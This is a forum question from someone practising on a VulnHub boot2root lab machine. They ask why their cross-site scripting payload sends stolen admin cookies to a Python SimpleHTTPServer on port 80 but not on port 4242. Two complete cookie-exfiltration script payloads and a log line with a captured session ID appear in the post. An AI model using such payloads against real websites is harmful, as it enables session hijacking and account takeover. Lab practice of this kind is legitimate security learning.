kali linux – XSS on port other than 80 not working via python’s SimpleHTTPServer


I am currently doing a boot2root VulnHub machine and I have found an XSS entry point to steal admin cookies.

The strange thing is that if I run my SimpleHTTPServer on port 80 then the following payload triggers
<script>document.write('<img src="https://192.168.1.130/'+document.cookie+'" width=0 height=0 border=0 />');</script>

And I get the cookie like this
192.168.1.14 - - (13/Sep/2020 09:23:36) "GET /PHPSESSID=m18d10ghina3pbtlhn5sttrm8o HTTP/1.1" 404 -

But if I run my SimpleHTTPServer let’s say on port 4242 or any other port (I have tried a handful), the following payload does not trigger
<script>document.write('<img src="https://192.168.1.130:4242/'+document.cookie+'" width=0 height=0 border=0 />');</script>

Or at least I don’t see anything

Please note that the boot2root VM seems to call every minute without fail

So I don’t know why this is happening. I am newish to CTFs, security, etc. I am probably missing something. Does SimpleHTTPServer only work on port 80? It could be as simple as that I guess but I see examples on the internet with other ports being used so I doubt this is the case

Any help or insight would be greatly appreciated

Regards
Crouz

P.S: I am using Kali Linux 2020.3 if that makes any difference